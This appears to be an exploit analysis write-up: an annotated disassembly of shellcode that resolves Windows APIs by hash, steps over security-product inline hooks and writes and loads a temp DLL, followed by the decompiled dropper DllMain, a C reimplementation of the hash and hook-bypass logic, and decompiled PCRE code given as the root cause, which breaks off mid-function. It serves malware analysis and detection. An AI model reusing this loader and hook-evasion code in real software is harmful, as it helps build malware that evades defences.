069440AD    B8 8B4030C3     mov     eax, C330408B
069440B2    3907            cmp     dword ptr [edi], eax
069440B4    74 03           je      short 069440B9
069440B6    47              inc     edi
069440B7  ^ EB F9           jmp     short 069440B2
069440B9    8BEF            mov     ebp, edi
069440BB    68 65006C00     push    6C0065
069440C0    68 72006E00     push    6E0072
069440C5    68 6B006500     push    65006B
069440CA    FC              cld
069440CB    33C9            xor     ecx, ecx
069440CD    8B1B            mov     ebx, dword ptr [ebx]
069440CF    8BF4            mov     esi, esp
069440D1    8B7B 20         mov     edi, dword ptr [ebx+20]
069440D4    B1 03           mov     cl, 3
069440D6    F3:A7           repe    cmps dword ptr es:[edi], dword ptr [esi]
069440D8  ^ 75 F3           jnz     short 069440CD
069440DA    8B5B 08         mov     ebx, dword ptr [ebx+8]
069440DD    8B53 3C         mov     edx, dword ptr [ebx+3C]
069440E0    8B541A 78       mov     edx, dword ptr [edx+ebx+78]
069440E4    8D441A EC       lea     eax, dword ptr [edx+ebx-14]
069440E8    FFD5            call    ebp
069440EA    8B541A 20       mov     edx, dword ptr [edx+ebx+20]
069440EE    03D3            add     edx, ebx
069440F0    03C3            add     eax, ebx
069440F2    33C9            xor     ecx, ecx
069440F4    E8 10000000     call    06944109
069440F9    53              push    ebx
069440FA    65:74 54        je      short 06944151
069440FD    68 72656164     push    64616572
06944102    43              inc     ebx
06944103    6F              outs    dx, dword ptr es:[edi]
06944104    6E              outs    dx, byte ptr es:[edi]
06944105    74 65           je      short 0694416C
06944107    78 74           js      short 0694417D
06944109    8B3424          mov     esi, dword ptr [esp]
0694410C    8B3A            mov     edi, dword ptr [edx]
0694410E    03FB            add     edi, ebx
06944110    B1 04           mov     cl, 4
06944112    F3:A7           repe    cmps dword ptr es:[edi], dword ptr [esi]
06944114    74 08           je      short 0694411E
06944116    83C2 04         add     edx, 4
06944119    83C0 04         add     eax, 4
0694411C  ^ EB EB           jmp     short 06944109
0694411E    8B10            mov     edx, dword ptr [eax]
06944120    03D3            add     edx, ebx
06944122    33C0            xor     eax, eax
06944124    8BC8            mov     ecx, eax
06944126    B1 20           mov     cl, 20
06944128    8BFC            mov     edi, esp
0694412A    F3:AB           rep     stos dword ptr es:[edi]
0694412C    C70424 10000100 mov     dword ptr [esp], 10010
06944133    54              push    esp                               ; pContext = { ContextFlags = CONTEXT_DEBUG_REGISTERS, Drx = 0 }
06944134    6A FE           push    -2
06944136    FFD2            call    edx                               ; SetThreadContext(0xFFFFFFFE, pContext)
06944138    90              nop
06944139    90              nop
0694413A    90              nop
0694413B    90              nop
0694413C    90              nop
0694413D    90              nop
0694413E    90              nop
0694413F    90              nop
06944140    90              nop
06944141    90              nop
06944142    90              nop
06944143    90              nop
06944144    90              nop
06944145    90              nop
06944146    90              nop
06944147    90              nop
06944148    60              pushad
06944149    81EC 20010000   sub     esp, 120
0694414F    8BFC            mov     edi, esp
06944151    C747 5C 1443940>mov     dword ptr [edi+5C], 6944314
06944158    90              nop
06944159    C747 58 00C6030>mov     dword ptr [edi+58], 3C600
06944160    C707 3274910C   mov     dword ptr [edi], 0C917432
06944166    C747 04 8E130AA>mov     dword ptr [edi+4], AC0A138E
0694416D    C747 08 39E27D8>mov     dword ptr [edi+8], 837DE239
06944174    C747 0C 8FF2186>mov     dword ptr [edi+C], 6118F28F
0694417B    C747 10 9332E49>mov     dword ptr [edi+10], 94E43293
06944182    C747 14 50D59BC>mov     dword ptr [edi+14], CB9BD550
06944189    C747 18 43BEACD>mov     dword ptr [edi+18], DBACBE43
06944190    C747 1C B2360F1>mov     dword ptr [edi+1C], 130F36B2
06944197    C747 20 C48D1F7>mov     dword ptr [edi+20], 741F8DC4
0694419E    C747 24 512FA20>mov     dword ptr [edi+24], 1A22F51
069441A5    C747 28 57660DF>mov     dword ptr [edi+28], FF0D6657
069441AC    C747 2C 9B878BE>mov     dword ptr [edi+2C], E58B879B
069441B3    C747 30 EDAFFFB>mov     dword ptr [edi+30], B4FFAFED
069441BA    C747 34 C2194B0>mov     dword ptr [edi+34], 14B19C2
069441C1    C747 38 7DF0A59>mov     dword ptr [edi+38], 9AA5F07D
069441C8    C747 3C E42B94C>mov     dword ptr [edi+3C], C5942BE4
069441CF    C747 40 EC9D5FA>mov     dword ptr [edi+40], A45F9DEC
069441D6    C747 44 CC77338>mov     dword ptr [edi+44], 8F3377CC
069441DD    E9 27010000     jmp     06944309
069441E2    33C0            xor     eax, eax
069441E4    64:A1 30000000  mov     eax, dword ptr fs:[30]
069441EA    8B40 0C         mov     eax, dword ptr [eax+C]
069441ED    8B40 14         mov     eax, dword ptr [eax+14]
069441F0    8B00            mov     eax, dword ptr [eax]
069441F2    8B00            mov     eax, dword ptr [eax]
069441F4    8B40 10         mov     eax, dword ptr [eax+10]
069441F7    8BE8            mov     ebp, eax
069441F9    8BF7            mov     esi, edi
069441FB    6A 11           push    11
069441FD    59              pop     ecx
069441FE    E8 C1000000     call    069442C4
06944203  ^ E2 F9           loopd   short 069441FE
06944205    8BEE            mov     ebp, esi
06944207    81EC 00040000   sub     esp, 400
0694420D    33C0            xor     eax, eax
0694420F    8945 30         mov     dword ptr [ebp+30], eax
06944212    8B7D 5C         mov     edi, dword ptr [ebp+5C]
06944215    54              push    esp
06944216    5F              pop     edi
06944217    81EC 00020000   sub     esp, 200
0694421D    57              push    edi
0694421E    68 00010000     push    100
06944223    FF55 08         call    dword ptr [ebp+8]                 ; GetTempPathA
06944226    33C0            xor     eax, eax
06944228    40              inc     eax
06944229    803C07 00       cmp     byte ptr [edi+eax], 0
0694422D  ^ 75 F9           jnz     short 06944228
0694422F    8945 60         mov     dword ptr [ebp+60], eax
06944232    C70407 6162632E mov     dword ptr [edi+eax], 2E636261
06944239    C74407 04 63666>mov     dword ptr [edi+eax+4], 676663
06944241    6A 00           push    0
06944243    6A 00           push    0
06944245    6A 02           push    2
06944247    6A 00           push    0
06944249    6A 00           push    0
0694424B    68 00000040     push    40000000
06944250    57              push    edi
06944251    8B45 10         mov     eax, dword ptr [ebp+10]
06944254    E8 49000000     call    069442A2
06944259    83F8 00         cmp     eax, 0
0694425C    7E 32           jle     short 06944290
0694425E    8945 34         mov     dword ptr [ebp+34], eax
06944261    C745 40 0000000>mov     dword ptr [ebp+40], 0
06944268    6A 00           push    0
0694426A    8D45 44         lea     eax, dword ptr [ebp+44]
0694426D    50              push    eax
0694426E    FF75 58         push    dword ptr [ebp+58]
06944271    FF75 5C         push    dword ptr [ebp+5C]
06944274    FF75 34         push    dword ptr [ebp+34]
06944277    FF55 20         call    dword ptr [ebp+20]                ; WriteFile
0694427A    FF75 34         push    dword ptr [ebp+34]                ; CloseHandle
0694427D    FF55 28         call    dword ptr [ebp+28]
06944280    57              push    edi
06944281    C745 20 6309784>mov     dword ptr [ebp+20], 41780963
06944288    8B45 00         mov     eax, dword ptr [ebp]
0694428B    E8 12000000     call    069442A2
06944290    81C4 C4070000   add     esp, 7C4
06944296    61              popad
06944297    8D65 D4         lea     esp, dword ptr [ebp-2C]           ; stackpivot
0694429A    C3              retn
0694429B    6A FF           push    -1
0694429D    6A FF           push    -1
0694429F    FF55 0C         call    dword ptr [ebp+C]
069442A2    8038 E8         cmp     byte ptr [eax], 0E8
069442A5    74 0A           je      short 069442B1
069442A7    8038 E9         cmp     byte ptr [eax], 0E9
069442AA    74 05           je      short 069442B1
069442AC    8038 EB         cmp     byte ptr [eax], 0EB
069442AF    75 11           jnz     short 069442C2
069442B1    8178 05 9090909>cmp     dword ptr [eax+5], 90909090
069442B8    74 08           je      short 069442C2
069442BA    8BFF            mov     edi, edi
069442BC    55              push    ebp
069442BD    8BEC            mov     ebp, esp
069442BF    8D40 05         lea     eax, dword ptr [eax+5]
069442C2    FFE0            jmp     eax                               ; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL) => LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg")
069442C4    51              push    ecx
069442C5    56              push    esi
069442C6    8B75 3C         mov     esi, dword ptr [ebp+3C]
069442C9    8B742E 78       mov     esi, dword ptr [esi+ebp+78]
069442CD    03F5            add     esi, ebp
069442CF    56              push    esi
069442D0    8B76 20         mov     esi, dword ptr [esi+20]
069442D3    03F5            add     esi, ebp
069442D5    33C9            xor     ecx, ecx
069442D7    49              dec     ecx
069442D8    41              inc     ecx
069442D9    AD              lods    dword ptr [esi]
069442DA    03C5            add     eax, ebp
069442DC    33DB            xor     ebx, ebx
069442DE    0FBE10          movsx   edx, byte ptr [eax]
069442E1    3AD6            cmp     dl, dh
069442E3    74 08           je      short 069442ED
069442E5    C1CB 07         ror     ebx, 7
069442E8    03DA            add     ebx, edx
069442EA    40              inc     eax
069442EB  ^ EB F1           jmp     short 069442DE
069442ED    3B1F            cmp     ebx, dword ptr [edi]
069442EF  ^ 75 E7           jnz     short 069442D8
069442F1    5E              pop     esi
069442F2    8B5E 24         mov     ebx, dword ptr [esi+24]
069442F5    03DD            add     ebx, ebp
069442F7    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]
069442FB    8B5E 1C         mov     ebx, dword ptr [esi+1C]
069442FE    03DD            add     ebx, ebp
06944300    8B048B          mov     eax, dword ptr [ebx+ecx*4]
06944303    03C5            add     eax, ebp
06944305    AB              stos    dword ptr es:[edi]
06944306    5E              pop     esi
06944307    59              pop     ecx
06944308    C3              retn
06944309    E8 D4FEFFFF     call    069441E2

Note that the shellcode pivots the stack back (`lea esp, [ebp-2C]; retn` at 06944297) to return to the normal execution flow rather than crashing the process. Two other details of the listing matter to a defender: kernel32 is located by walking the PEB loader list (fs:[18] is the TEB, +30 the PEB, +0C Ldr, +1C InInitializationOrderModuleList) and comparing the UTF-16 prefix "kernel" pushed at 069440BB-069440C5; and every resolved API is entered through the stub at 069442A2, which, when the function starts with a call/jmp opcode (E8/E9/EB) not followed by four NOPs, executes the 5-byte hot-patch prologue (mov edi,edi; push ebp; mov ebp,esp) itself and resumes at +5, stepping over an inline hook planted on the API's prologue.
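Two pieces of the shellcode above are worth having in runnable form: the export-name hash its GetProcAddress replacement uses (069442D8-069442EF: h = ror(h, 7) + sign-extended byte, terminating on 0x00 and, because `cmp dl, dh` compares the byte with its own sign extension, also on 0xFF), and the hook-stepping dispatch at 069442A2. The following is an added example written for this page, not code from the original post or the sample. The 17 hash constants are copied from the `mov dword ptr [edi+..]` stores at 06944160-069441D6 in the order the resolver loop (ecx = 0x11) consumes them, so slot N is what the listing addresses as [ebp+4*N]; the candidate API names are the ones the listing's comments identify; the three prologue byte strings are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hash from the export walker at 069442D8: h = ror32(h, 7) + (int8_t)c per
   byte. The loop compares dl with dh (the sign-extension byte), so it stops
   on 0x00 and also on 0xFF. */
static uint32_t ror7_hash(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p != 0x00 && *p != 0xFF; p++) {
        h = (h >> 7) | (h << 25);
        h += (uint32_t)(int32_t)(int8_t)*p;      /* movsx edx, byte ptr [eax] */
    }
    return h;
}

/* The 17 hashes stored at [edi+0..edi+0x40] (06944160-069441D6); the loop at
   069441FB-06944203 resolves them in order, so slot N lands at [ebp+4*N]. */
static const uint32_t kHashTable[17] = {
    0x0C917432, 0xAC0A138E, 0x837DE239, 0x6118F28F, 0x94E43293, 0xCB9BD550,
    0xDBACBE43, 0x130F36B2, 0x741F8DC4, 0x01A22F51, 0xFF0D6657, 0xE58B879B,
    0xB4FFAFED, 0x014B19C2, 0x9AA5F07D, 0xC5942BE4, 0xA45F9DEC,
};

/* Export names the listing's comments attribute to specific slots. */
static const char *const kCandidates[] = {
    "LoadLibraryA", "GetTempPathA", "CreateFileA", "WriteFile", "CloseHandle",
};

/* Slot index whose hash matches `name`, or -1 if the table has no such entry. */
static int slot_for(const char *name)
{
    uint32_t h = ror7_hash(name);
    for (int i = 0; i < 17; i++)
        if (kHashTable[i] == h)
            return i;
    return -1;
}

/* The dispatch stub at 069442A2. Returns the offset at which the shellcode
   enters the resolved API: 0 = jump to the first byte; 5 = the shellcode runs
   `mov edi,edi; push ebp; mov ebp,esp` itself and jumps past the first five
   bytes, i.e. over a jmp/call that an inline hook planted on the hot-patchable
   prologue. A branch followed by four NOPs is treated as genuine code. */
static int entry_offset(const uint8_t *fn)
{
    if (fn[0] != 0xE8 && fn[0] != 0xE9 && fn[0] != 0xEB)
        return 0;
    uint32_t after5;
    memcpy(&after5, fn + 5, sizeof after5);
    return after5 == 0x90909090u ? 0 : 5;
}

/* Constructed prologues for entry_offset(). */
static const uint8_t kCleanPrologue[9]  = {0x8B,0xFF,0x55,0x8B,0xEC,0x83,0xEC,0x10,0x56}; /* mov edi,edi; push ebp; mov ebp,esp; sub esp,10h; push esi */
static const uint8_t kHookedPrologue[9] = {0xE9,0x11,0x22,0x33,0x44,0x83,0xEC,0x10,0x56}; /* jmp rel32 written over the first 5 bytes */
static const uint8_t kBranchThenNops[9] = {0xE9,0x11,0x22,0x33,0x44,0x90,0x90,0x90,0x90}; /* jmp rel32 followed by NOP padding */

int main(void)
{
    for (size_t i = 0; i < sizeof kCandidates / sizeof kCandidates[0]; i++) {
        int slot = slot_for(kCandidates[i]);
        printf("%-13s ror7=%08X -> slot %2d ([ebp+%02X])\n",
               kCandidates[i], ror7_hash(kCandidates[i]), slot, slot < 0 ? 0 : 4 * slot);
    }
    printf("entry offsets: clean=%d hooked=%d branch+nops=%d\n",
           entry_offset(kCleanPrologue), entry_offset(kHookedPrologue),
           entry_offset(kBranchThenNops));
    return 0;
}
```

Running it confirms the listing's annotations: LoadLibraryA hashes to slot 0 ([ebp+0]), GetTempPathA to slot 2 ([ebp+8]), CreateFileA to slot 4 ([ebp+10]), WriteFile to slot 8 ([ebp+20]) and CloseHandle to slot 10 ([ebp+28]). The same hash routine over a dump of kernel32's export names will recover the remaining slots, and the constant 0x0C917432 / ror-7 combination is a usable detection signature for this loader.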
abc.cfg:
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  char *p1; // eax@2
  char c1; // cl@3
  DWORD d1; // edx@4
  DWORD d2; // ecx@4
  HANDLE hFile; // esi@4
  HANDLE hHeap1; // eax@4
  void *lpAddress; // edi@4
  HANDLE hHeap2; // eax@4
  CHAR *lpBuffer; // esi@4
  CHAR *p2; // eax@4
  CHAR c2; // cl@5
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+0h] [bp-164h]@1
  DWORD NumberOfBytesWritten; // [sp+10h] [bp-154h]@4
  DWORD flOldProtect; // [sp+14h] [bp-150h]@4
  struct _STARTUPINFOA StartupInfo; // [sp+18h] [bp-14Ch]@2
  char lpFileName[260]; // [sp+5Ch] [bp-108h]@2
  unsigned int v20; // [sp+160h] [bp-4h]@1

  v20 = (unsigned int)&ProcessInformation ^ __security_cookie;
  if ( fdwReason == DLL_PROCESS_ATTACH )
  {
    GetTempPathA(0x104u, lpFileName);
    p1 = (char *)&StartupInfo.hStdError + 3;
    do
      c1 = (p1++)[1];
    while ( c1 );
    d1 = dword_1000927C;                        // 'etne'
    *(_DWORD *)p1 = dword_10009278;             // 'cces'
    d2 = dword_10009280;                        // 'xx.r'
    *((_DWORD *)p1 + 1) = d1;
    LOWORD(d1) = word_10009284;                 // 'x'
    *((_DWORD *)p1 + 2) = d2;
    *((_WORD *)p1 + 6) = d1;
    hFile = CreateFileA(lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    WriteFile(hFile, &unk_1000AC50, 0x157D0u, &NumberOfBytesWritten, 0);
    CloseHandle(hFile);
    hHeap1 = GetProcessHeap();
    lpAddress = HeapAlloc(hHeap1, HEAP_ZERO_MEMORY, 0x1000u);
    VirtualProtect(lpAddress, 0x1000u, PAGE_EXECUTE_READWRITE, &flOldProtect);
    hHeap2 = GetProcessHeap();
    lpBuffer = (CHAR *)HeapAlloc(hHeap2, HEAP_ZERO_MEMORY, 0x100u);
    GetTempPathA(0x100u, lpBuffer);
    p2 = lpBuffer - 1;
    do
      c2 = (p2++)[1];
    while ( c2 );
    *(_DWORD *)p2 = dword_10009278;             // 'cces'
    *((_DWORD *)p2 + 1) = dword_1000927C;       // 'etne'
    *((_DWORD *)p2 + 2) = dword_10009280;       // 'xx.r'
    *((_WORD *)p2 + 6) = word_10009284;         // 'x'
    memset(lpAddress, 0x90u, 0x1000u);
    memset(&StartupInfo, 0, 0x44u);
    StartupInfo.cb = 0x44u;
    StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
    ProcessInformation.hProcess = 0;
    ProcessInformation.hThread = 0;
    ProcessInformation.dwProcessId = 0;
    ProcessInformation.dwThreadId = 0;
    CreateProcessA(lpBuffer, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  }
  return 1;
}

After all these hops it finally drops the payload seccenter.xxx (the name assembled from the 'cces' / 'etne' / 'xx.r' / 'x' constants above, written to %TEMP% and launched with CreateProcessA).
The paper skims over the root cause of the vulnerability, so it is appended here at the end; thanks to cscoder.
Also note that the attachment is the POC itself; don't mix the two up.
void *__cdecl sub_10529FB0(LPSTR szRegExp, int a2, int a3, int a4, int a5, int a6)
{
  int v6; // ebx@1
  LPSTR v7; // ebp@1
  int v8; // esi@1
  int v10; // eax@8
  int v11; // eax@9
  signed int v12; // eax@11
  int v13; // ebx@16
  unsigned int v14; // eax@21
  int v15; // eax@31
  int v16; // eax@31
  int v17; // esi@33
  signed int v18; // eax@36
  CHAR *v19; // edi@48
  int v20; // eax@49
  void *v21; // ecx@53
  int v22; // esi@53
  void *v23; // eax@53
  void *v24; // ebp@53
  int v25; // ebx@55
  int v26; // ebx@55
  int v27; // ST04_4@55
  char v28; // ST00_1@55
  int v29; // eax@62
  int v30; // eax@66
  int v31; // esi@67
  int v32; // eax@81
  __int16 v33; // ax@89
  int v34; // edx@90
  int a3a; // [sp+10h] [bp-884h]@1
  int a5a; // [sp+14h] [bp-880h]@1
  LPSTR v37; // [sp+18h] [bp-87Ch]@1
  int a13; // [sp+1Ch] [bp-878h]@1
  LPSTR v39; // [sp+20h] [bp-874h]@1
  int a10; // [sp+24h] [bp-870h]@48
  int a9; // [sp+28h] [bp-86Ch]@48
  int v42; // [sp+2Ch] [bp-868h]@1
  int v43; // [sp+30h] [bp-864h]@1
  int v44; // [sp+34h] [bp-860h]@1
  int a12; // [sp+38h] [bp-85Ch]@18
  int v46; // [sp+3Ch] [bp-858h]@18
  int v47; // [sp+40h] [bp-854h]@18
  int v48; // [sp+44h] [bp-850h]@18
  char *v49; // [sp+48h] [bp-84Ch]@48
  char *v50; // [sp+4Ch] [bp-848h]@48
  LPSTR v51; // [sp+50h] [bp-844h]@48
  CHAR *v52; // [sp+54h] [bp-840h]@48
  unsigned int v53; // [sp+58h] [bp-83Ch]@48
  int v54; // [sp+5Ch] [bp-838h]@48
  int v55; // [sp+60h] [bp-834h]@48
  int v56; // [sp+64h] [bp-830h]@48
  int v57; // [sp+68h] [bp-82Ch]@48
  int v58; // [sp+6Ch] [bp-828h]@48
  int v59; // [sp+70h] [bp-824h]@48
  int v60; // [sp+74h] [bp-820h]@48
  int v61; // [sp+78h] [bp-81Ch]@48
  int v62; // [sp+7Ch] [bp-818h]@48
  int v63; // [sp+80h] [bp-814h]@55
  int v64; // [sp+84h] [bp-810h]@37
  int v65; // [sp+88h] [bp-80Ch]@38
  char v66; // [sp+8Ch] [bp-808h]@38
  char v67; // [sp+8Dh] [bp-807h]@38
  unsigned __int8 v68; // [sp+90h] [bp-804h]@48
  unsigned int v69; // [sp+890h] [bp-4h]@1

  v69 = (unsigned int)&a3a ^ __security_cookie;
  v6 = a4;
  v7 = szRegExp;
  v8 = a3;
  v39 = szRegExp;
  v42 = a3;
  v43 = a4;
  v44 = a5;
  a13 = 1;
  a5a = 0;
  a3a = 0;
  v37 = szRegExp;
  if ( !a4 )
  {
    if ( a3 )
      *(_DWORD *)a3 = 0x63u;
    return 0;
  }
  *(_DWORD *)a4 = 0;
  if ( a3 )
    *(_DWORD *)a3 = 0;
  if ( !a5 )
  {
    v10 = 0x10u;
LABEL_75:
    *(_DWORD *)v6 = *(_DWORD *)&off_10D07D70[4 * v10];
    if ( v8 )
      *(_DWORD *)v8 = v10;
    return 0;
  }
  *(_DWORD *)a5 = 0;
  v11 = a2;
  if ( a2 & 0x800 && !(a2 & 0x2000) )
  {
    v12 = sub_1057F290(szRegExp, -1);
    *(_DWORD *)a5 = v12;
    if ( v12 >= 0 )
    {
      v10 = 0x2Cu;
      goto LABEL_75;
    }
    v11 = a2;
  }
  if ( v11 & 0xFF838580 )
  {
    v10 = 0x11u;
LABEL_74:
    v8 = v42;
    v6 = v43;
    *(_DWORD *)v44 = v37 - v7;
    goto LABEL_75;
  }
  v13 = a6;
  if ( !a6 )
    v13 = (int)&unk_10B3EEC8;
  a12 = v13;
  v46 = v13 + 0x100;
  v47 = v13 + 0x200;
  v48 = v13 + 0x340;
  if ( *szRegExp == '(' && szRegExp[1] == '*' )
  {
    if ( strncmp(szRegExp + 2, "CR)", 3u) )
    {
      if ( strncmp(szRegExp + 2, "LF)", 3u) )
      {
        if ( strncmp(szRegExp + 2, "CRLF)", 5u) )
        {
          if ( strncmp(szRegExp + 2, "ANY)", 4u) )
          {
            if ( strncmp(szRegExp + 2, "ANYCRLF)", 8u) )
              goto LABEL_31;
            a3a = 10;
            v14 = 0x500000u;
          }
          else
          {
            a3a = 6;
            v14 = 0x400000u;
          }
        }
        else
        {
          a3a = 7;
          v14 = 0x300000u;
        }
      }
      else
      {
        a3a = 5;
        v14 = 0x200000u;
      }
    }
    else
    {
      a3a = 5;
      v14 = 0x100000u;
    }
    a2 = v14 | a2 & 0xFF8FFFFF;
  }
LABEL_31:
  v15 = a2;
  v16 = v15 & 0x700000;
  if ( v16 > (signed int)0x300000u )
  {
    if ( v16 != 0x400000 )
    {
      if ( v16 == 0x500000 )
      {
        v64 = 2;
        v17 = 0;
        goto LABEL_48;
      }
      goto LABEL_43;
    }
    v17 = 0;
    goto LABEL_46;
  }
  if ( v16 == 0x300000 )
  {
    v18 = '\r\n';
    v17 = 0;
    goto LABEL_37;
  }
  v17 = 0;
  if ( !v16 )
  {
LABEL_46:
    v64 = 1;
    goto LABEL_48;
  }
  if ( v16 != 0x100000 )
  {
    if ( v16 == 0x200000 )
    {
      v18 = 10;
      goto LABEL_37;
    }
LABEL_43:
    v10 = 0x38u;
    goto LABEL_74;
  }
  v18 = 13;
LABEL_37:
  v64 = v17;
  if ( v18 <= (signed int)0xFFu )
  {
    v65 = 1;
    v66 = v18;
  }
  else
  {
    v65 = 2;
    v66 = BYTE1(v18);
    v67 = v18;
  }
LABEL_48:
  v49 = (char *)&v68;
  v58 = v17;
  v59 = v17;
  v57 = v17;
  v55 = v17;
  v56 = v17;
  v54 = v17;
  v50 = (char *)&v68;
  v53 = (unsigned int)&v68;
  v51 = szRegExp;
  v19 = &szRegExp[a3a];
  a3a = (int)&v68;
  v61 = 0;
  v62 = 0;
  v52 = &szRegExp[strlen(szRegExp)];
  v60 = a2;
  v37 = v19;
  v68 = 0x5Du;
    sub_105297C0(a2, a2 & 7, &a3a, &v37, (int)&a5a, 0, 0, 0, (int)&a9, (int)&a10, 0, (int)&a12, (int)&a13);// length pass: a13 receives the size the compiled regex will need
  v10 = a5a;
  if ( a5a )
    goto LABEL_74;
  v20 = a13;
  if ( a13 > (signed int)0x10000u )
  {
    v10 = 20;
    goto LABEL_74;
  }
  if ( (a2 & 7) != (v60 & 7) )
  {
    v20 = a13 + 2;                              // 0x5B+2=0x5D
    a13 += 2;
  }
  v21 = (void *)(v55 * (v56 + 3));              // v55=v56=0
  v22 = (int)((char *)v21 + v20 + 40);
    v23 = sub_105246E0(v21, (DWORD)((char *)v21 + v20 + 40));// v21=0, 40+0x5D=0x85: allocate the block that will hold the compiled regex
  v24 = v23;
  if ( !v23 )
  {
    v10 = 21;
LABEL_73:
    v7 = v39;
    goto LABEL_74;
  }
  *((_DWORD *)v23 + 1) = v22;
  *(_DWORD *)v23 = 'PCRE';
  *((_DWORD *)v23 + 2) = v60;
  *((_WORD *)v23 + 10) = 0;
  *((_DWORD *)v23 + 3) = 0;
  *((_WORD *)v23 + 11) = 0;
  *((_WORD *)v23 + 12) = 40;
  *((_WORD *)v23 + 13) = v56;
  *((_WORD *)v23 + 14) = v55;
  *((_WORD *)v23 + 15) = 0;
  *((_DWORD *)v23 + 8) = v13 != (_DWORD)&unk_10B3EEC8 ? v13 : 0;
  *((_DWORD *)v23 + 9) = 0;
  v57 = 0;
  v55 = 0;
  v54 = (int)((char *)v23 + *((_WORD *)v23 + 12));
  v25 = *((_WORD *)v23 + 13) * *((_WORD *)v23 + 14);
  v53 = (unsigned int)&v68;
  v26 = v54 + v25;
  v50 = (char *)v26;
  v61 = 0;
  v62 = 0;
  v63 = 0;
  *(_BYTE *)v26 = ']';
  v27 = *((_DWORD *)v23 + 2) & 7;
  v28 = *((_DWORD *)v23 + 2);
  v37 = v19;
  a3a = v26;
    sub_105297C0(v28, v27, &a3a, &v37, (int)&a5a, 0, 0, 0, (int)&a9, (int)&a10, 0, (int)&a12, 0);// fill pass: write the compiled regex into the block just allocated
  *((_WORD *)v24 + 8) = v57;
  *((_WORD *)v24 + 9) = v58;
  if ( v62 )
    *((_DWORD *)v24 + 2) |= 0x80000000u;
  if ( v63 )
    a10 = -1;
  if ( !a5a && *v37 )
    a5a = 22;
  v29 = a3a;
  *(_BYTE *)a3a = 0;
  if ( v29 + 1 - v26 > a13 )
  {
    a5a = 23;
LABEL_72:
    sub_10524700(v24);
    v10 = a5a;
    goto LABEL_73;
  }
  if ( a5a )
    goto LABEL_72;
  while ( v53 > (unsigned int)&v68 )
  {
    v53 -= 2;
    a13 = *(_BYTE *)(v53 + 1) | (*(_BYTE *)v53 << 8);
    v30 = sub_10524F20();
    if ( !v30 )
    {
      a5a = 53;
      goto LABEL_72;
    }
    v31 = a13;
    *(_BYTE *)(a13 + v26) = (unsigned __int16)(v30 - (_WORD)v26) >> 8;
    *(_BYTE *)(v31 + v26 + 1) = v30 - v26;
    if ( a5a )
      goto LABEL_72;
  }
  if ( *((_WORD *)v24 + 9) > *((_WORD *)v24 + 8) )
  {
    a5a = 15;
    goto LABEL_72;
  }
  if ( !(*((_DWORD *)v24 + 2) & 0x10) )
  {
    v39 = (LPSTR)*((_DWORD *)v24 + 2);
    if ( sub_10529AF0(v26, 0, v59) )
    {
      *((_DWORD *)v24 + 2) |= 0x10u;
    }
    else
    {
      LOWORD(v32) = a9;
      if ( a9 < 0 && (v32 = sub_10529DF0(v26), v32 < 0) )
      {
        if ( sub_10529C80(v26, 0, v59) )
          *((_DWORD *)v24 + 2) |= 0x10000000u;
      }
      else
      {
        if ( v32 & 0x100 && *(_BYTE *)(v46 + (unsigned __int8)v32) == (unsigned __int8)v32 )
          LOWORD(v32) = (unsigned __int8)v32;
        *((_DWORD *)v24 + 2) |= 0x40000000u;
        *((_WORD *)v24 + 10) = v32;
      }
    }
  }
  v33 = a10;
  if ( a10 >= 0 )
  {
    v34 = *((_DWORD *)v24 + 2);
    if ( !(v34 & 0x10) || a10 & 0x200 )
    {
      if ( a10 & 0x100 && *(_BYTE *)(v46 + (unsigned __int8)a10) == (unsigned __int8)a10 )
        v33 = a10 & 0xFEFF;
      *((_WORD *)v24 + 11) = v33;
      *((_DWORD *)v24 + 2) = v34 | 0x20000000;
    }
  }
  return v24;
}

// a13 != NULL: length pass (only count bytes); otherwise fill pass (write the compiled regex)
signed int __cdecl sub_105297C0(char a1, int a2, int *a3, LPSTR *pszRegExp, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13)
{
  int v13; // ebx@1
  int v14; // esi@1
  int v15; // edi@1
  int v16; // eax@1
  int v17; // ecx@1
  int v18; // ebp@1
  int v19; // eax@1
  int v20; // esi@1
  char v21; // cl@4
  int v22; // eax@5
  int v23; // eax@7
  int v24; // eax@20
  int v25; // eax@27
  int v26; // ecx@28
  LPSTR v27; // edi@29
  int v28; // ecx@31
  int v29; // eax@32
  __int16 v30; // cx@32
  int v32; // esi@35
  int v33; // eax@35
  __int16 v34; // cx@36
  int v35; // esi@37
  char v36; // cl@39
  int v37; // edx@39
  char v38; // cl@39
  char v39; // dl@39
  int v40; // eax@39
  int v41; // eax@41
  int v42; // ecx@41
  int v43; // edx@43
  int v44; // [sp+10h] [bp-30h]@1
  LPSTR v45; // [sp+14h] [bp-2Ch]@1
  int a6a; // [sp+18h] [bp-28h]@8
  int v47; // [sp+1Ch] [bp-24h]@1
  int v48; // [sp+20h] [bp-20h]@1
  int v49; // [sp+24h] [bp-1Ch]@1
  int a2a; // [sp+28h] [bp-18h]@8
  int v51; // [sp+2Ch] [bp-14h]@1
  int v52; // [sp+30h] [bp-10h]@1
  int v53; // [sp+34h] [bp-Ch]@1
  int a7a; // [sp+38h] [bp-8h]@1
  int v55; // [sp+3Ch] [bp-4h]@1

  v13 = *a3;
  v45 = *pszRegExp;
  v48 = v13;
  v53 = v13;
  v51 = 0;
  sub_1050E300((int)v45);
  v14 = a13;
  v15 = a12;
  a7a = a11;
  v16 = a8;
  v44 = a8 + 6;
  v55 = v13;
  *(_BYTE *)(v13 + 1) = 0;
  *(_BYTE *)(v13 + 2) = 0;
  v17 = *(_DWORD *)(v15 + 48);
  v18 = -2;
  v19 = v13 + v16 + 3;
  v47 = -2;
  a11 = v19;
  v49 = v17;
  v52 = v17;
  v20 = v14 != 0 ? (int)&v44 : 0;
  while ( 1 )
  {
